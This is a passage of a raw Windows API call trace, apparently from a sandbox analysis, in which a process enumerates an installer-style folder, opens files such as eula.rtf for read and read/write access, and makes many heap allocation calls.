dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0060.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.516] AreFileApisANSI () returned 1 [0060.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031", lpUsedDefaultChar=0x0) returned 27 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.517] AreFileApisANSI () returned 1 [0060.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031") returned 27 [0060.517] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031" (normalized: "c:\\588bce7c90097ed212\\1031"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.517] GetLastError () returned 0x5 [0060.517] GetLastError () returned 0x5 [0060.517] SetLastError (dwErrCode=0x5) [0060.517] GetLastError () returned 0x5 [0060.517] SetLastError (dwErrCode=0x5) [0060.517] GetLastError () returned 0x5 [0060.517] SetLastError (dwErrCode=0x5) [0060.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.517] AreFileApisANSI () returned 1 [0060.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031") returned 27 [0060.518] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031" (normalized: "c:\\588bce7c90097ed212\\1031"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.518] GetLastError () returned 0x5 [0060.518] GetLastError () returned 0x5 [0060.518] SetLastError (dwErrCode=0x5) [0060.518] GetLastError () returned 0x5 [0060.518] SetLastError (dwErrCode=0x5) [0060.518] GetLastError () returned 0x5 [0060.518] SetLastError (dwErrCode=0x5) [0060.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0060.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.518] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1032", cAlternateFileName="")) returned 1 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.518] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.519] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.519] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0060.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.520] AreFileApisANSI () returned 1 [0060.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1031\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.521] AreFileApisANSI () returned 1 [0060.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0060.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0060.521] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.521] GetFileType (hFile=0x424) returned 0x1 [0060.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.522] CloseHandle (hObject=0x424) returned 1 [0060.522] AreFileApisANSI () returned 1 [0060.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0060.522] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.522] GetFileType (hFile=0x424) returned 0x1 [0060.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.522] CloseHandle (hObject=0x424) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.523] AreFileApisANSI () returned 1 [0060.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0060.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\eula.rtf") returned 36 [0060.523] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b)) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.523] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0060.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 